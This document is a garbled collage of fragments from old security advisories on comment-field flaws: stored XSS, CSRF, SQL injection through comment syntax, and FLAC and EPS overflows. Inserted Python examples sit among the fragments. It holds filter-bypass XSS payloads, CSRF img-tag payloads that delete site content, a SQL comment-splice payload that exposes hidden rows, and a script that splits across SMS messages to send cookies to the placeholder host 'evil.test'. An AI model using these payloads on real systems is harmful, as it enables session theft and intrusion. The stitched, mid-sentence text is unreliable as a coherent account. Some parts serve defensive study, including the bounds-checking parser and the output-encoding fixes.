> ActiveX control not marked as safe" is ENABLED.
This Saved XSS hole works even with this option disabled (i.e. with default
settings). But when we want to use ActiveX in our code (e.g. for a Code
Execution attack), then such a problem occurs. It's a bug in IE (when there is
a preceding comment tag), which I found when researching the possibility of doing
CE via XSS in IE. So I found the workaround for this bug: set this
option to Enabled or Prompt (for Local intranet).
> Then you say that:
> "if it's on other line (i.e. without preceding comment),
II - CROSS SITE SCRIPTING
When a guest adds a comment, an HTTP POST request is sent to
"comment_add_cgi.php". Before the comment is written into
a file, several conditions are checked. The first is
that the IP address sent in the POST body must be the same
as the IP returned by the getIP() function. Let's see
the code:
___________
ChX Security |
Advisory #3 |
==========
-> "WP Comment Remix 1.4.3 Multiple Vulnerabilities" <-
_________________
Advisory Information |
===============
Title: WP Comment Remix 1.4.3 Multiple Vulnerabilities
details/pocs
———————————
1. Denial of Service vulnerability
Post Revolution allows some HTML tags in comments and removes all
non-permitted ones.
The vulnerable code is at lines 456 to 462 in common.php:
while(stripos($s,'<') > 0){
$pos[1] = stripos($s,'<');
the data allocation location, heap structure and error handlers of the
affected software. After overwriting a large amount of memory and
pointers with arbitrary data, code execution could then be redirected to
the attacker's payload located inside the FLAC file.
Vulnerability #2: VORBIS Comment String Size Field Heap Overflow
The second vulnerability lies within the parsing of any VORBIS Comment
String Size field. Setting this field to an overly large size, such
as 0xFFFFFFF, could also result in another heap-based overflow allowing
arbitrary code to execute in the context of the decoding program.
Similar to the Metadata Block Size Overflow vulnerability above,
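The check that the paragraph says is missing, as an added Python example (not MPlayer's demux_audio.c code): a parser for the body of a FLAC VORBIS_COMMENT block that validates every little-endian length field against the bytes actually left before using it, so a string size such as 0xFFFFFFFF is rejected instead of becoming a copy length. The caps MAX_STRING and MAX_COMMENTS, the helper names and the sample blocks are assumptions.

```python
import struct

MAX_STRING = 1 << 20     # assumed cap on one comment string
MAX_COMMENTS = 1024      # assumed cap on the number of comments


def parse_vorbis_comment(body):
    """Parse the body of a FLAC VORBIS_COMMENT metadata block, i.e. the bytes
    that follow the 4-byte block header (whose own 24-bit length is big-endian;
    everything inside the body is 32-bit little-endian, Vorbis style).
    Layout: vendor_length, vendor_string, comment_count, then
    comment_count x (length, "KEY=value")."""
    pos = 0

    def read_u32():
        nonlocal pos
        if pos + 4 > len(body):
            raise ValueError("truncated length field at offset %d" % pos)
        (value,) = struct.unpack_from("<I", body, pos)
        pos += 4
        return value

    def read_string(length):
        nonlocal pos
        # The check the vulnerable decoder lacks: the size field is attacker
        # data and must be bounded by what is actually present before it is
        # used to allocate or copy.
        remaining = len(body) - pos
        if length > MAX_STRING or length > remaining:
            raise ValueError("string size %#x exceeds remaining %d bytes" % (length, remaining))
        text = body[pos:pos + length].decode("utf-8", errors="replace")
        pos += length
        return text

    vendor = read_string(read_u32())
    count = read_u32()
    # Each comment needs at least its 4-byte length field, so the count is
    # bounded by the remaining size as well as by the policy cap.
    if count > MAX_COMMENTS or count > (len(body) - pos) // 4:
        raise ValueError("implausible comment count %#x" % count)
    comments = {}
    for _ in range(count):
        key, _sep, value = read_string(read_u32()).partition("=")
        comments.setdefault(key.upper(), []).append(value)
    return vendor, comments


def build_vorbis_comment(vendor, fields):
    """Build a well-formed block body; used here only to construct test input."""
    def encode(s):
        raw = s.encode("utf-8")
        return struct.pack("<I", len(raw)) + raw
    return encode(vendor) + struct.pack("<I", len(fields)) + b"".join(encode(f) for f in fields)


def is_well_formed(body):
    try:
        parse_vorbis_comment(body)
        return True
    except ValueError:
        return False


# Constructed samples: a valid block and one whose string size field is 0xFFFFFFFF.
GOOD_BLOCK = build_vorbis_comment("reference libFLAC 1.2.1", ["TITLE=demo", "ARTIST=nobody"])
HOSTILE_BLOCK = (struct.pack("<I", 1) + b"v" + struct.pack("<I", 1)
                 + struct.pack("<I", 0xFFFFFFFF) + b"TITLE=x")

if __name__ == "__main__":
    print(parse_vorbis_comment(GOOD_BLOCK))
    print("hostile block accepted:", is_well_formed(HOSTILE_BLOCK))
```

The same pattern applies to the block-size field of the metadata header: read the declared size, compare it with what is left in the file, and only then allocate or copy.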
return $user;
}
}
It is possible to create a crafted comment for an article and inject
PHP code into the "web link" field, which is not properly validated.
A remote attacker could then use this code to execute shell commands
remotely and eventually hide their tracks (e.g. by deleting the injected
comment).
The password changing page is vulnerable to CSRF. This vulnerability
can be used to change the victim's password. For details of this
process see the "Exploits/PoCs" section.
+--> Stored XSS Vulnerability
The comment page is vulnerable to stored XSS, but comments are published
only after administrator confirmation. However, this XSS vulnerability can be
used in conjunction with the more serious security hole (CSRF) in
order to change the administrator's password.
*Technical Description / Proof of Concept Code*
The vulnerability was found in the following code, used to parse FLAC
comments inside MPlayer:
/-----------
libmpdemux/demux_audio.c
Dear Felix,
While I love your comment and really welcome constructive criticism,
I actually think you should keep the focus on the Fox News style
question marks. Nowhere is it said that this is the end of
Defence in Depth (as a paradigm); we ask the question.
Then again, you seem to be judging something you haven't seen
or read. Is this because I ask Fox News style questions and you
give Fox News style comments?
#######################################################################
# COMPASS SECURITY ADVISORY http://www.csnc.ch/
#######################################################################
#
# CVE ID : CVE-2009-4505
# Product: OpenCMS OAMP Comments Module
# Vendor: Open Source, Alkacon GmbH (Cologne, Germany)
# Subject: Cross-site scripting (XSS)
# Risk: High
# Effect: Anonymously exploitable
# Author: Cyrill Brunschwiler (cyrill.brunschwiler@csnc.ch)
3. Vulnerability Description
------------------------------------------------------------------------------------------------------------------------
Cute News is a powerful and easy to use news management system that uses
flat files to store its database. It supports commenting, archives,
search function, file upload management, backup & restore, IP banning,
flood protection and more. It's available for free from
http://www.cutephp.com/. Cute News is at the time of writing, the second
most popular script on www.hotscripts.com. UTF-8 CuteNews is a current
fork of the Cute News project which is designed to improve security and
Diigo Toolbar - Global XSS and Information Leakage in SSL URLs
== Global XSS ==
Diigo (http://www.diigo.com/) is a social bookmarking and sharing
application which allows users to see other users' comments and notes
for every website. For this feature users must use the Diigolet
bookmarklet or the Diigo Toolbar (http://www.diigo.com/tools). These are
almost mandatory for using Diigo, and almost all Diigo members have them
installed.
<body ononsubmitload=aleonsubmitrt(123);>
<salertcript>aalertlert(123);</salertcript>
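The two payloads above defeat a filter that deletes forbidden keywords in a single pass, so that the deletion itself assembles the forbidden word out of the surrounding characters. Below is an added Python model of such a filter and of the bypass (not Diigo's code; the keyword list is an assumption inferred from the payloads), next to the two fixes a practitioner would compare: repeating the filter until nothing changes, and output encoding, which is the one that actually holds.

```python
import html
import re

# Assumed blacklist, inferred from the payloads: each entry is a word the
# filter deletes from the comment text before it is rendered.
BLACKLIST = ["script", "alert", "onsubmit"]
PATTERN = re.compile("|".join(map(re.escape, BLACKLIST)), re.IGNORECASE)


def strip_once(text):
    """The weak filter: one left-to-right pass. Characters that a deletion
    brings together are never re-scanned, so 'sALERTcript' becomes 'script'."""
    return PATTERN.sub("", text)


def strip_until_fixpoint(text, max_rounds=20):
    """Repeat the pass until a round removes nothing. This stops the nesting
    trick, but it is still a blacklist: anything not on the list gets through."""
    for _ in range(max_rounds):
        stripped = strip_once(text)
        if stripped == text:
            return stripped
        text = stripped
    raise ValueError("filter did not converge")


def encode_for_html(text):
    """The real fix for text that lands in HTML: encode it, do not edit it."""
    return html.escape(text, quote=True)


# The payloads quoted in the advisory text above.
PAYLOAD_SCRIPT = "<salertcript>aalertlert(123);</salertcript>"
PAYLOAD_BODY = "<body ononsubmitload=aleonsubmitrt(123);>"

if __name__ == "__main__":
    for p in (PAYLOAD_SCRIPT, PAYLOAD_BODY):
        print(strip_once(p), "|", strip_until_fixpoint(p), "|", encode_for_html(p))
```

Note what the fixpoint variant does with the second payload: it ends up with `<body onload=(123);>`, an event handler attribute intact because "onload" was never on the list. That is why the encoding function, not a longer blacklist, is the fix.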
7. Stored XSS in Reviews module comments functionality
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Security risk: medium
Preconditions:
1. attacker must be registered user
required for the substr function and there is no substitute solution).
To bypass this check, I consider MySQL and PHP together. The PHP
functions consider all strings only up to the first null character. MySQL also
supports comment syntax like /* the comment */, and before executing any SQL
query these comments are removed from the query by MySQL.
Thus I place a null character within a MySQL comment right after each
open parenthesis. So
This attack works in Internet Explorer when the option "Initialize and
script ActiveX controls not marked as safe" (for the Local intranet zone) is
turned on (Enabled or Prompt). It's a bug in Microsoft's code :-) and this
setting is the way to work around it. The setting is needed only when the attack
goes via this XSS and the JS code is placed on the same line as a
comment. If it's on another line (i.e. without a preceding comment),
the code works without this setting (Disabled) too. That can be
achieved when the attack is made not via XSS but by placing the attack code
(in an appropriate way) directly in the body of the page.
==============
Core tells the WordPress team that other administrative PHP modules can
also be rendered by non-administrative users, such as module
'admin-post.php' and 'link-parse-opml.php'.
. 2009-07-02:
WordPress team comments that 'admin.php' and 'admin-post.php' are
intentionally open and plugins can choose to hook either privileged or
unprivileged actions. They also comment that unprivileged access to
'link-parse-opml.php' is benign but having this file open is bad form.
. 2009-07-02:
-->Fixed bug date: Not fixed
-->Info patch: Not fixed
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: To my girlfriend Marijose... brother, sister-in-law, parents (and friends xD) for their support.
-->EXTRA-COMMENT: Thanks to everyone for putting up with me! (Love you, little one!)
##############################
//////////////////////////////
------------------------------------------------------
IMPACT: Stored XSS, XSRF, defacement, etc.
------------------------------------------------------
---Remote XSS Exploit [add comment section]---
The "add comment" section is vulnerable: HTML can be injected into the comment box and sent to the server.
URL : http://[TARGET]/[webalbum_PATH]/photo_add-c.php
POST Variable: comment --> XSS Vulnerabilities
Web: http://hackish.altervista.org
E-mail: deme [at] hackish [dot] eu
SimplePHPBlog website: http://www.simplephpblog.com/
- posting [img=add_block.php?action=delete&block_id=*] in a comment,
  where * is the ID of a block: when the administrator reads the comment,
  block * will be erased.
- posting [img=add_link.php?action=delete&link_id=*] in a comment
Reasons:
1. uninitialized arrays "patterns" and "replacements"
Preconditions:
1. attacker must be logged in as a user
Comments:
1. The exploit uses the "preg_replace" e-modifier
2. The "register_globals" setting does not matter
3. Sentinel will not stop this exploit
4. The POST method will leave clean logs in most real-world cases
Hello,
This is Robert Wann and I am representing Enova Technology. I'd like to respond to your published article about the so-called "False Sense of Security" for a balanced review.
My comments follow my signature line, and I look forward to your publishing our comments (Vendor Comments) on the same sites to balance the view and give us an opportunity to defend ourselves. Thank you, and I look forward to hearing from you.
Regards,
Robert Wann
CTO
Enova Technology
original HTTP POST request.
The following examples show the two queries that are executed when the
<sql> element contains the string "0=1) /* " and the <order_by> element
contains the string "*/)--". User input that is active within an SQL
query is marked with a ">", user input that begins or ends a comment is
marked with a "+", and application-provided query parts that are now
commented out are marked with a "|":
----- Query 1a ---------------------------------------------------------
Select EVN_ID, EVNRCR_ID, evntitle, evnnote, evnlocation, evnstartdate,
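The splice described above, as an added Python example using sqlite3 (not the advisory's application or its real query, which the page shows only in part): a constructed query template with two interpolated fields, the page's payloads "0=1) /* " and "*/)--" fed into it, the statement as the engine sees it once comments are gone, and a hardened form with a bound parameter plus an allow-listed sort column. The table, rows and template are assumptions; the /* */ and -- comment syntax is the same in SQLite and MySQL.

```python
import re
import sqlite3

# Constructed stand-in for the application's query: two user-controlled
# fragments (<sql> and <order_by>) are pasted into the statement around
# application-supplied text. The real query is not shown on the page.
TEMPLATE = ("SELECT id, title, owner FROM events "
            "WHERE (owner = {owner} AND ({sql})) AND deleted = 0 "
            "ORDER BY ({order_by}) LIMIT 10")


def build_query(owner, sql, order_by):
    """The vulnerable construction: plain string interpolation."""
    return TEMPLATE.format(owner=owner, sql=sql, order_by=order_by)


def effective_query(query):
    """What the engine executes once comments are gone: '/* ... */' spans are
    dropped and, for a single-line statement, everything after '--' too."""
    return re.sub(r"/\*.*?\*/", "", query, flags=re.S).split("--", 1)[0].strip()


def demo_db():
    """Constructed sample data: two rows owned by user 1 (one deleted) and
    one row owned by someone else."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE events (id INTEGER, title TEXT, owner INTEGER, deleted INTEGER);
        INSERT INTO events VALUES (1, 'own, visible', 1, 0);
        INSERT INTO events VALUES (2, 'own, deleted', 1, 1);
        INSERT INTO events VALUES (3, 'someone else', 2, 0);
    """)
    return con


def run_unsafe(con, owner, sql, order_by):
    return con.execute(build_query(owner, sql, order_by)).fetchall()


ORDER_COLUMNS = {"id", "title"}


def run_safe(con, owner, title_filter, order_by):
    """Hardened form: the predicate value is a bound parameter and the
    ORDER BY column comes from an allow-list, so neither field can open
    or close a comment inside the statement."""
    if order_by not in ORDER_COLUMNS:
        raise ValueError("unknown sort column: %r" % order_by)
    q = ("SELECT id, title, owner FROM events WHERE owner = ? AND title LIKE ? "
         "AND deleted = 0 ORDER BY %s LIMIT 10" % order_by)
    return con.execute(q, (owner, "%" + title_filter + "%")).fetchall()


if __name__ == "__main__":
    con = demo_db()
    q = build_query(1, "0=1) /* ", "*/)--")
    print(q)
    print(effective_query(q))
    print(run_unsafe(con, 1, "0=1) /* ", "*/)--"))
    print(run_unsafe(con, 1, "1=1) OR (1=1) /* ", "*/)--"))
```

With the page's payload the engine sees only `WHERE (owner = 1 AND (0=1) )`: the `AND deleted = 0`, the ORDER BY and the LIMIT between the two fields are inside the comment, and the tail after the second field is behind `--`. Neither field alone is a usable injection (each leaves an unbalanced parenthesis), which is the point of the two-field splice. The variant `1=1) OR (1=1) /* ` returns every row, deleted and foreign ones included.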
> security evaluation criteria. WG3 then eventually expressed a formal
> interest in carving deeper into the security testing methodology topic,
> issuing and approving a resolution for starting a study period of one
> year. The base of this study period, which is the first step towards a
> standardization path, would be constituted by the OSSTMM 3 and all
> security experts from national bodies will freely contribute and comment
> on it. By the end of the study period it will be determined how ISO will
> receive OSSTMM contents in its family of security standards. As outlined
> in Malaka’s presentation there are many standards that could benefit
> from a standard aligned with OSSTMM contents, such as 21827, 15408,
> 18045, 19790 and, of course, 27001. Parts of OSSTMM concepts have
Vulnerability ID: HTB22417
Reference: http://www.htbridge.ch/advisory/stored_xss_vulnerability_in_syntype_cms_comment_text_field.html
Product: synType CMS
Vendor: MindArray GbR
Vulnerable Version: V.0.12.2 and Probably Prior Versions
Vendor Notification: 03 June 2010
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Huawei E960 HSDPA Router (firmware version 246.11.04.11.110sp04) is vulnerable to an XSS attack delivered by SMS. One of the features of this router is the ability to send and receive SMS through its web interface. The SMS text is presented unescaped/unfiltered in the inbox view, so an attacker can craft malicious short messages to gain control over the victim's router.
Details
--------
The first 32 characters of every incoming SMS are presented unescaped in the inbox view. The 32-character limit can be overcome by using several messages and inserting a JavaScript comment that merges the current message with the next one.
Example:
The first message ends with /*, which comments out all the HTML code up to the second message
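The message-splitting trick, as an added Python example (not the advisory's own proof of concept): a constructed model of the inbox view that emits the first 32 characters of each SMS unescaped, a packer that cuts a longer script into 32-character messages joined by JavaScript block comments, and a check of what the browser's script engine ends up with. The table markup, the per-message 32-character budget and the assumption that the inbox lists messages in the order they arrived are taken as given; if the view shows the newest message first, the chunks have to be sent in reverse order.

```python
import html
import re

SMS_LIMIT = 32   # characters of each message the inbox view shows


def render_inbox_vulnerable(messages):
    """Constructed model of the inbox view: the first 32 characters of each
    SMS, inserted into the page without escaping."""
    return "".join(f"<tr><td>{m[:SMS_LIMIT]}</td></tr>" for m in messages)


def render_inbox_fixed(messages):
    """Same view with the output encoded; nothing here can open a tag."""
    return "".join(f"<tr><td>{html.escape(m[:SMS_LIMIT])}</td></tr>" for m in messages)


def split_payload(js, limit=SMS_LIMIT):
    """Pack whitespace-separated JS tokens into SMS-sized chunks. Every chunk
    but the last ends with '/*' and every chunk but the first starts with '*/',
    so the table markup the inbox inserts between two messages lands inside a
    JS comment. Tokens are never split: a block comment inside an identifier
    would cut it in two, because a comment counts as whitespace."""
    tokens = js.split()
    msgs, cur = [], "<script>"
    for tok in tokens:
        sep = "" if cur in ("<script>", "*/") else " "
        # +2 reserves room for the '/*' that closes every non-final message
        if len(cur) + len(sep) + len(tok) + 2 > limit:
            if cur in ("<script>", "*/"):
                raise ValueError("token does not fit in one SMS: %r" % tok)
            msgs.append(cur + "/*")
            cur, sep = "*/", ""
        cur += sep + tok
    if len(cur) + len("</script>") > limit:
        msgs.append(cur + "/*")
        cur = "*/"
    msgs.append(cur + "</script>")
    return msgs


def script_as_parsed(page):
    """What a browser's JS engine gets: the script element's text with block
    comments treated as whitespace; None if the page has no script element."""
    m = re.search(r"<script>(.*?)</script>", page, re.S)
    if not m:
        return None
    return " ".join(re.sub(r"/\*.*?\*/", " ", m.group(1), flags=re.S).split())


# Constructed payload; 'evil.test' is a placeholder host.
PAYLOAD = "new Image().src = 'http://evil.test/?c=' + document.cookie"

if __name__ == "__main__":
    for m in split_payload(PAYLOAD):
        print(len(m), m)
    print(script_as_parsed(render_inbox_vulnerable(split_payload(PAYLOAD))))
    print(script_as_parsed(render_inbox_fixed(split_payload(PAYLOAD))))
```

Sent as one message, the payload is cut at 32 characters and never reaches its closing tag; split into three messages it survives the truncation, and the `</td></tr><tr><td>` between rows is swallowed by the comments. The fixed renderer defeats it entirely, since the output encoding is applied after the truncation as well.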
<?php
/*
Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps)
overlong DSC Comment Buffer Overflow Exploit
by Nine:Situations:Group::pyrokinesis
site: http://retrogod.altervista.org/
An overlong string as DSC comment (more than 42000 bytes)
results in a direct EIP overwrite.
Exception is first-chance so the program will never crash.
-->Fixed bug date: N/A
-->Info patch: Not fixed
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: To my girlfriend Marijose... brother, sister-in-law, parents (and friends xD) for their support.
-->EXTRA-COMMENT: Thanks to everyone for putting up with me! (Love you, little one!)
#########################
Comdev Web Blogger is your voice and also allows others to give you feedback on a post-by-post basis.
Site members can now create, manage and upload photos to their own blogs. FEATURES: Non Template-Based Gives You Flexibility to Fit
the Web Blogger to Your Web Design Page • Multiple user accounts to create & invite friends to their own blogs • Hot Blogs,
Latest Blogs • RSS News Feeds • Blogs Categorisation • Hot Blogs & Latest Blogs • Search Blogs • Mini Calendar • Monthly Archive•
Links to Friends' Blog • Public or Friends View Only Blogs • Set Post Comments Permission • Friends Login • Forms Submission with
CAPTCHA Image Verification • WYSIWYG Editor for Blog & Comment • Notify Friends of New Blog • Set View & Post Comment Permissions •
Set Date & Time Format • Local Time Zone • Pre-defined Front-end CSS • Personalized Emails & Auto-Responders •
Installation Support available
---------------------------------------------------------------------------
$ find /usr/local/share/vim -type f -name \*.vim -exec grep -h \
    '\<exe\(c\(u\(te\?\)\?\)\?\)\?\>' {} \; | wc -l
991
Without comments:
$ find /usr/local/share/vim -type f -name \*.vim -exec grep -h \
    '\<exe\(c\(u\(te\?\)\?\)\?\)\?\>' {} \; | grep -v '^[[:blank:]]*"' | wc -l
901
* Country: USA
* Outcome: Link Spam
* Software: WordPress
* Vertical: Government
Whether comment spam by itself is an application failure or a necessary evil
for sites allowing rich comments is an open question. However, it is reported
that in this case a vulnerability in WordPress allowed the spammers to
actually penetrate the site and modify pages, not just abuse comments.